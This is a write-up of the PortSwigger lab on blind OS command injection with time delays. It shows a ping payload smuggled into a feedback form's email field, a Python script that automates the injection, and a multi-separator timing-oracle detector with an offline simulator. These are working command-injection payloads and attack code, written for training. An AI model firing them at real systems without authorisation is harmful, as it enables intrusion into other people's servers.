2. Blind OS command injection with time delays

Let's open the vulnerable lab:

Move around a little bit:

In Burp Suite we see a POST request to the target (the feedback form) with these parameters:

Let's test them out:

We tried pinging localhost through the email parameter, and the response took about as long as the ping itself takes to finish (roughly one second per packet). Nothing about the command shows up in the response, so the timing is the only signal that the value reaches a shell:

||ping+-c+5+127.0.0.1||

The lab wants a 10-second delay, so we raise the packet count to 10:

And we solved the lab:

Now let's solve it with a Python 3 script:

```python
import os
import re
import sys
import time

import requests

# Burp's listener; uncomment the proxies line below to watch the traffic there
# (Python must then trust Burp's CA certificate for the HTTPS lab URL).
proxies = {
    "http": "http://127.0.0.1:8080",
    "https": "http://127.0.0.1:8080"
}

session = requests.session()
# session.proxies.update(proxies)


def CommandInjection(url):
    print("[*] Get CSRF Token.")
    csrf = re.findall(r'name="csrf" value="(.+?)"', session.get(url=url + "feedback").text)
    if not csrf:
        print("[-] No CSRF token found on the feedback page.")
        sys.exit(1)
    print("[*] Perform Command Injection.")
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    # '+' decodes to a space in a form body, so the shell runs: ping -c 10 127.0.0.1
    data = f"csrf={csrf[0]}&name=test&email=test@test.com||ping+-c+10+127.0.0.1||&subject=test&message=test"
    start = time.monotonic()
    session.post(url=url + "feedback/submit", headers=headers, data=data)
    # The injection is blind: the only evidence is the delay, expect about 10 seconds here.
    print(f"[*] Response took {time.monotonic() - start:.1f}s.")


if __name__ == "__main__":
    if len(sys.argv) != 2:
        script_name = os.path.basename(__file__)
        print(f"[-] Usage: python {script_name} https://YOUR-LAB-ID.web-security-academy.net/")
        sys.exit(1)
    url = sys.argv[1]  # must end with a slash, the paths are appended to it
    CommandInjection(url)
    print("[+] Solved.")
```
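The script above fires the payload once and trusts the lab's "Solved" banner. As an added example (not part of the original write-up), the following turns the same idea into a proper timing oracle: it tries several shell separators rather than only `||`, takes the median of a few samples to damp network jitter, and calls the field injectable only when the injected request is slower than a baseline by most of the requested delay. `requests_sender` (for the real lab) and `simulated_sender` (a constructed offline stand-in that models Linux `ping -c N` as about N-1 seconds and only honours the `||` form used above) are my own helpers, not the lab's or the author's code.

```python
import re
import time
from typing import Callable, Dict, Optional
from urllib.parse import urlencode

# Separator shapes worth trying; the write-up above only used the "||...||" form.
SEPARATORS = ("||{cmd}||", ";{cmd};", "&{cmd}&", "`{cmd}`")
BASE_EMAIL = "test@test.com"


def timing_command(delay: int) -> str:
    """Command that blocks for roughly `delay` seconds on a Unix target.
    `ping -c N` sends N echo requests one second apart, so N == delay is close
    enough for the lab's 10-second threshold."""
    return f"ping -c {delay} 127.0.0.1"


def inject(base_value: str, separator: str, delay: int) -> str:
    """Append the timing command, wrapped in the given separator, to a field value."""
    return base_value + separator.format(cmd=timing_command(delay))


def build_form(csrf: str, email_value: str) -> str:
    """Encode the feedback form. urlencode percent-encodes '|', ';', '&' and '@',
    so the separators survive form parsing and reach the shell intact."""
    fields = {"csrf": csrf, "name": "test", "email": email_value,
              "subject": "test", "message": "test"}
    return urlencode(fields)


def _median(values: list) -> float:
    ordered = sorted(values)
    return ordered[len(ordered) // 2]


def detect_time_delay(send: Callable[[str], float], delay: int = 10,
                      samples: int = 3, min_fraction: float = 0.8) -> Dict[str, object]:
    """send(email_value) -> elapsed seconds for one feedback submission.
    Reports the first separator whose median response time exceeds the baseline by
    at least min_fraction * delay; medians over `samples` requests damp jitter."""
    baseline = _median([send(BASE_EMAIL) for _ in range(samples)])
    for sep in SEPARATORS:
        injected = _median([send(inject(BASE_EMAIL, sep, delay)) for _ in range(samples)])
        if injected - baseline >= min_fraction * delay:
            return {"vulnerable": True, "separator": sep,
                    "baseline": baseline, "injected": injected}
    return {"vulnerable": False, "separator": None, "baseline": baseline, "injected": None}


def requests_sender(base_url: str, proxies: Optional[dict] = None,
                    timeout: float = 60.0) -> Callable[[str], float]:
    """Sender against the real lab (hypothetical helper): fetches a fresh CSRF token,
    posts the form and returns the wall-clock time of the POST."""
    import requests  # imported here so the offline simulation runs without it

    session = requests.Session()
    session.proxies.update(proxies or {})

    def send(email_value: str) -> float:
        page = session.get(base_url + "feedback", timeout=timeout).text
        match = re.search(r'name="csrf" value="([^"]+)"', page)
        if match is None:
            raise RuntimeError("no CSRF token on the feedback page")
        body = build_form(match.group(1), email_value)
        start = time.monotonic()
        session.post(base_url + "feedback/submit", data=body, timeout=timeout,
                     headers={"Content-Type": "application/x-www-form-urlencoded"})
        return time.monotonic() - start

    return send


def simulated_sender(vulnerable: bool) -> Callable[[str], float]:
    """Constructed stand-in for the lab so the detector can run offline.
    The vulnerable variant only executes a `||`-wrapped command (the shape used above)
    and models Linux `ping -c N` as N-1 seconds (N packets, one second apart).
    Nothing actually sleeps; it just returns the modelled elapsed time."""
    def send(email_value: str) -> float:
        elapsed = 0.2  # modelled normal round trip
        match = re.search(r"\|\|ping -c (\d+) 127\.0\.0\.1\|\|", email_value)
        if vulnerable and match:
            elapsed += int(match.group(1)) - 1
        return elapsed
    return send


if __name__ == "__main__":
    print(detect_time_delay(simulated_sender(True)))
    print(detect_time_delay(simulated_sender(False)))
```

Against the real lab you would call `detect_time_delay(requests_sender("https://YOUR-LAB-ID.web-security-academy.net/"))`; keep `timeout` comfortably above `delay`, otherwise the slow response you are looking for is reported as a failure instead of a finding.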
